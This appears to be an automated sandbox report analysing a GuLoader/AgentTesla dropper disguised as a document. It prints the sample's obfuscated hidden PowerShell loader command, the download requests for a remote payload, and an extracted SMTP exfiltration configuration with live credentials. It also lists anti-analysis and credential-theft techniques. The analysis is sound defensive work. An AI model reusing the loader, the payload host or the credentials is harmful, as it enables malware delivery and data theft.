Edit tour

Windows Analysis Report
doc20250319-00712.bat.exe

Overview

General Information

Sample name:	doc20250319-00712.bat.exe
Analysis ID:	1643226
MD5:	0f8d5c1387254083ba2886da0119dd4e
SHA1:	b94e09f2de72827e57981a451940a329a311274a
SHA256:	6d017ff436a539b349744a0caf5fda43e08f4c861333aa0662ab8cc04945b848
Tags:	exeHUNuser-smica83
Infos:

Detection

AgentTesla, GuLoader

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Early bird code injection technique detected

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Yara detected AgentTesla

Yara detected GuLoader

Check if machine is in data center or colocation facility

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Found suspicious powershell code related to unpacking or dynamic code loading

Joe Sandbox ML detected suspicious sample

Loading BitLocker PowerShell Module

Powershell drops PE file

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Queues an APC in another process (thread injection)

Sigma detected: Suspicious Executable File Creation

Sigma detected: Suspicious Script Execution From Temp Folder

Suspicious powershell command line found

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

Checks if the current process is being debugged

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to dynamically determine API calls

Contains functionality to modify clipboard data

Contains functionality to shutdown / reboot the system

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Msiexec Initiated Connection

Sigma detected: Suspicious Outbound SMTP Connections

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses SMTP (mail sending)

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

doc20250319-00712.bat.exe (PID: 6968 cmdline: "C:\Users\user\Desktop\doc20250319-00712.bat.exe" MD5: 0F8D5C1387254083BA2886DA0119DD4E)

powershell.exe (PID: 6076 cmdline: "powershell.exe" -windowstyle hidden " $Volumenkontrollen=cat -raw 'C:\Users\user\AppData\Local\Temp\Reguardant30\taoist\Nomadisk.Bla';$Burrock107=$Volumenkontrollen.substring(4268,3);.$Burrock107($Volumenkontrollen)" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 5844 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

msiexec.exe (PID: 7948 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Agent Tesla, AgentTesla	A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.	SWEED	http://blog.nsfocus.net/sweed-611/ http://l1v1ngc0d3.wordpress.com/2021/11/12/agenttesla-dropped-via-nsis-installer/ http://ropgadget.com/posts/originlogger.html http://www.secureworks.com/research/threat-profiles/gold-galleon https://0xmrmagnezi.github.io/malware%20analysis/AgentTesla/	https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Port": "587", "Host": "sslout.de", "Username": "0x0@erika-klos.de", "Password": "nulldataset123"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
0000000C.00000002.2422375489.000000002208D000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000C.00000002.2422375489.0000000022061000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000C.00000002.2422375489.0000000022061000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000C.00000002.2422375489.00000000220B1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000003.00000002.1779201822.000000000B183000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
Process Memory Space: msiexec.exe PID: 7948	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: msiexec.exe PID: 7948	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Click to see the 2 entries

Sigma Signatures

System Summary

Sigma detected: Suspicious Executable File Creation

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6076, TargetFilename: C:\Users\user\AppData\Local\Temp\Reguardant30\taoist\Massen\Hypothetic\Coppersmiths\Flusher108\doc20250319-00712.bat.exe

Sigma detected: Suspicious Script Execution From Temp Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "powershell.exe" -windowstyle hidden " $Volumenkontrollen=cat -raw 'C:\Users\user\AppData\Local\Temp\Reguardant30\taoist\Nomadisk.Bla';$Burrock107=$Volumenkontrollen.substring(4268,3);.$Burrock107($Volumenkontrollen)" , CommandLine: "powershell.exe" -windowstyle hidden " $Volumenkontrollen=cat -raw 'C:\Users\user\AppData\Local\Temp\Reguardant30\taoist\Nomadisk.Bla';$Burrock107=$Volumenkontrollen.substring(4268,3);.$Burrock107($Volumenkontrollen)" , CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\doc20250319-00712.bat.exe", ParentImage: C:\Users\user\Desktop\doc20250319-00712.bat.exe, ParentProcessId: 6968, ParentProcessName: doc20250319-00712.bat.exe, ProcessCommandLine: "powershell.exe" -windowstyle hidden " $Volumenkontrollen=cat -raw 'C:\Users\user\AppData\Local\Temp\Reguardant30\taoist\Nomadisk.Bla';$Burrock107=$Volumenkontrollen.substring(4268,3);.$Burrock107($Volumenkontrollen)" , ProcessId: 6076, ProcessName: powershell.exe

Sigma detected: Msiexec Initiated Connection

Source: Network Connection

Author: frack113: Data: DestinationIp: 178.63.45.97, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 7948, Protocol: tcp, SourceIp: 192.168.2.10, SourceIsIpv6: false, SourcePort: 49695

Sigma detected: Suspicious Outbound SMTP Connections

Source: Network Connection

Author: frack113: Data: DestinationIp: 134.119.18.23, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 7948, Protocol: tcp, SourceIp: 192.168.2.10, SourceIsIpv6: false, SourcePort: 49698

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -windowstyle hidden " $Volumenkontrollen=cat -raw 'C:\Users\user\AppData\Local\Temp\Reguardant30\taoist\Nomadisk.Bla';$Burrock107=$Volumenkontrollen.substring(4268,3);.$Burrock107($Volumenkontrollen)" , CommandLine: "powershell.exe" -windowstyle hidden " $Volumenkontrollen=cat -raw 'C:\Users\user\AppData\Local\Temp\Reguardant30\taoist\Nomadisk.Bla';$Burrock107=$Volumenkontrollen.substring(4268,3);.$Burrock107($Volumenkontrollen)" , CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\doc20250319-00712.bat.exe", ParentImage: C:\Users\user\Desktop\doc20250319-00712.bat.exe, ParentProcessId: 6968, ParentProcessName: doc20250319-00712.bat.exe, ProcessCommandLine: "powershell.exe" -windowstyle hidden " $Volumenkontrollen=cat -raw 'C:\Users\user\AppData\Local\Temp\Reguardant30\taoist\Nomadisk.Bla';$Burrock107=$Volumenkontrollen.substring(4268,3);.$Burrock107($Volumenkontrollen)" , ProcessId: 6076, ProcessName: powershell.exe

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern UHCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-19T16:45:38.904682+0100	2803270	2	Potentially Bad Traffic	192.168.2.10	49695	178.63.45.97	443	TCP
2025-03-19T16:45:41.040506+0100	2803270	2	Potentially Bad Traffic	192.168.2.10	49696	178.63.45.97	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: msiexec.exe.7948.12.memstrmin

Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "sslout.de", "Username": "0x0@erika-klos.de", "Password": "nulldataset123"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\Reguardant30\taoist\Massen\Hypothetic\Coppersmiths\Flusher108\doc20250319-00712.bat.exe

ReversingLabs: Detection: 30%

Multi AV Scanner detection for submitted file

Source: doc20250319-00712.bat.exe	Virustotal: Detection: 39%			Perma Link
Source: doc20250319-00712.bat.exe	ReversingLabs: Detection: 30%

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 96.5% probability

Source: doc20250319-00712.bat.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 178.63.45.97:443 -> 192.168.2.10:49695 version: TLS 1.2

Source:	Binary string: stem.Core.pdbU source: powershell.exe, 00000003.00000002.1776604931.00000000082EB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdba source: powershell.exe, 00000003.00000002.1776604931.000000000829F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ws\System.Core.pdb source: powershell.exe, 00000003.00000002.1776604931.00000000082EB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\System.Core.pdbt source: powershell.exe, 00000003.00000002.1772793488.000000000732B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000003.00000002.1776604931.000000000829F000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\doc20250319-00712.bat.exe	Code function: 0_2_00405451 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,	0_2_00405451
Source: C:\Users\user\Desktop\doc20250319-00712.bat.exe	Code function: 0_2_00405E95 FindFirstFileA,FindClose,	0_2_00405E95
Source: C:\Users\user\Desktop\doc20250319-00712.bat.exe	Code function: 0_2_00402645 FindFirstFileA,	0_2_00402645

Source: global traffic

TCP traffic: 192.168.2.10:49698 -> 134.119.18.23:587

Source: global traffic

HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 208.95.112.1 208.95.112.1
Source: Joe Sandbox View	IP Address: 134.119.18.23 134.119.18.23

Source: Joe Sandbox View

ASN Name: GD-EMEA-DC-CGN1DE GD-EMEA-DC-CGN1DE

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown

DNS query: name: ip-api.com

Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.10:49695 -> 178.63.45.97:443
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.10:49696 -> 178.63.45.97:443

Source: global traffic

TCP traffic: 192.168.2.10:49698 -> 134.119.18.23:587

Source: global traffic	HTTP traffic detected: GET /kdot.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: www.sunce-projekt.hrCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /kdot.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: www.sunce-projekt.hrCache-Control: no-cache

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /kdot.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: www.sunce-projekt.hrCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /kdot.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: www.sunce-projekt.hrCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: www.sunce-projekt.hr
Source: global traffic	DNS traffic detected: DNS query: ip-api.com
Source: global traffic	DNS traffic detected: DNS query: sslout.de

Source: msiexec.exe, 0000000C.00000002.2423694174.00000000242F7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.2164151860.00000000242F3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.2164076973.00000000242ED000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000002.2422375489.0000000022093000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.2163949122.00000000242E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://certificates.godaddy.com/repository/0
Source: msiexec.exe, 0000000C.00000002.2423694174.00000000242F7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.2164151860.00000000242F3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.2164076973.00000000242ED000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000002.2422375489.0000000022093000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.2163949122.00000000242E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://certificates.godaddy.com/repository/gdig2.crt0
Source: msiexec.exe, 0000000C.00000002.2423694174.00000000242F7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.2164151860.00000000242F3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.2164076973.00000000242ED000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000002.2422375489.0000000022093000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.2163949122.00000000242E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://certs.godaddy.com/repository/1301
Source: msiexec.exe, 0000000C.00000002.2423694174.00000000242F7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.2164151860.00000000242F3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.2164076973.00000000242ED000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000002.2422375489.0000000022093000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.2163949122.00000000242E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.godaddy.com/gdig2s1-39361.crl0
Source: msiexec.exe, 0000000C.00000002.2423694174.00000000242F7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.2164151860.00000000242F3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.2164076973.00000000242ED000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000002.2422375489.0000000022093000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.2163949122.00000000242E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.godaddy.com/gdroot-g2.crl0F
Source: powershell.exe, 00000003.00000002.1772793488.000000000732B000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1772793488.000000000733D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.1860701770.0000000006400000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microsoft
Source: msiexec.exe, 0000000C.00000002.2422375489.0000000022031000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com
Source: msiexec.exe, 0000000C.00000002.2422375489.0000000022031000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com/line/?fields=hosting
Source: doc20250319-00712.bat.exe, doc20250319-00712.bat.exe.3.dr	String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: doc20250319-00712.bat.exe, doc20250319-00712.bat.exe.3.dr	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: powershell.exe, 00000003.00000002.1770805003.0000000005DFA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: msiexec.exe, 0000000C.00000002.2423694174.00000000242F7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.2164151860.00000000242F3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.2164076973.00000000242ED000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000002.2422375489.0000000022093000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.2163949122.00000000242E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.godaddy.com/0
Source: msiexec.exe, 0000000C.00000002.2423694174.00000000242F7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.2164151860.00000000242F3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.2164076973.00000000242ED000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000002.2422375489.0000000022093000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.2163949122.00000000242E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.godaddy.com/05
Source: powershell.exe, 00000003.00000002.1767732385.0000000004EE6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000003.00000002.1767732385.0000000004EE6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000003.00000002.1767732385.0000000004D91000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000002.2422375489.0000000022031000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000003.00000002.1767732385.0000000004EE6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: msiexec.exe, 0000000C.00000002.2422375489.0000000022093000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://sslout.de
Source: powershell.exe, 00000003.00000002.1767732385.0000000004EE6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000003.00000002.1767732385.0000000004D91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000003.00000002.1767732385.0000000004EE6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: msiexec.exe, 0000000C.00000002.2423694174.00000000242F7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.2164151860.00000000242F3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.2164076973.00000000242ED000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000002.2422375489.0000000022093000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.2163949122.00000000242E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://certs.godaddy.com/repository/0
Source: powershell.exe, 00000003.00000002.1770805003.0000000005DFA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000003.00000002.1770805003.0000000005DFA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000003.00000002.1770805003.0000000005DFA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000003.00000002.1767732385.0000000004EE6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000003.00000002.1770805003.0000000005DFA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: msiexec.exe, 0000000C.00000003.1892497841.0000000006400000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000002.2407825000.00000000063CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.sunce-projekt.hr/
Source: msiexec.exe, 0000000C.00000003.1892497841.0000000006400000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000002.2407825000.00000000063CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.sunce-projekt.hr/kdot.bin
Source: msiexec.exe, 0000000C.00000003.1892497841.0000000006400000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.sunce-projekt.hr/kdot.binC
Source: msiexec.exe, 0000000C.00000002.2407825000.00000000063CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.sunce-projekt.hr/kdot.binXY
Source: msiexec.exe, 0000000C.00000003.1892497841.0000000006400000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.sunce-projekt.hr/kdot.bing
Source: msiexec.exe, 0000000C.00000003.1892497841.0000000006400000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.sunce-projekt.hr/kdot.binu

Source: unknown	Network traffic detected: HTTP traffic on port 49695 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49696
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49695
Source: unknown	Network traffic detected: HTTP traffic on port 49696 -> 443

Source: unknown

HTTPS traffic detected: 178.63.45.97:443 -> 192.168.2.10:49695 version: TLS 1.2

Source: C:\Users\user\Desktop\doc20250319-00712.bat.exe

Code function: 0_2_00404FBA GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,KiUserCallbackDispatcher,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_00404FBA

Source: C:\Users\user\Desktop\doc20250319-00712.bat.exe

0_2_00404FBA

System Summary

Powershell drops PE file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\Reguardant30\taoist\Massen\Hypothetic\Coppersmiths\Flusher108\doc20250319-00712.bat.exe

Jump to dropped file

Source: C:\Users\user\Desktop\doc20250319-00712.bat.exe

Code function: 0_2_004030E2 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,

0_2_004030E2

Source: C:\Users\user\Desktop\doc20250319-00712.bat.exe	Code function: 0_2_004047F9	0_2_004047F9
Source: C:\Users\user\Desktop\doc20250319-00712.bat.exe	Code function: 0_2_00406A93	0_2_00406A93
Source: C:\Users\user\Desktop\doc20250319-00712.bat.exe	Code function: 0_2_004062BC	0_2_004062BC
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_0751C5A6	3_2_0751C5A6
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_087E0040	3_2_087E0040
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_087E52D0	3_2_087E52D0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_087E52C0	3_2_087E52C0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_087E8778	3_2_087E8778
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 12_2_02794AF0	12_2_02794AF0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 12_2_02794220	12_2_02794220
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 12_2_0279F718	12_2_0279F718
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 12_2_02793ED8	12_2_02793ED8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 12_2_250333D0	12_2_250333D0

Source: doc20250319-00712.bat.exe, 00000000.00000000.1156923565.000000000043F000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamemissyllabification.exe` vs doc20250319-00712.bat.exe
Source: doc20250319-00712.bat.exe	Binary or memory string: OriginalFilenamemissyllabification.exe` vs doc20250319-00712.bat.exe
Source: doc20250319-00712.bat.exe.3.dr	Binary or memory string: OriginalFilenamemissyllabification.exe` vs doc20250319-00712.bat.exe

Source: doc20250319-00712.bat.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@6/26@3/3

Source: C:\Users\user\Desktop\doc20250319-00712.bat.exe

Code function: 0_2_004042BD GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,

0_2_004042BD

Source: C:\Users\user\Desktop\doc20250319-00712.bat.exe

Code function: 0_2_00402036 CoCreateInstance,MultiByteToWideChar,

0_2_00402036

Source: C:\Users\user\Desktop\doc20250319-00712.bat.exe

File created: C:\Program Files (x86)\lanser.lnk

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5844:120:WilError_03

Source: C:\Users\user\Desktop\doc20250319-00712.bat.exe

File created: C:\Users\user\AppData\Local\Temp\nsn6FBB.tmp

Jump to behavior

Source: doc20250319-00712.bat.exe

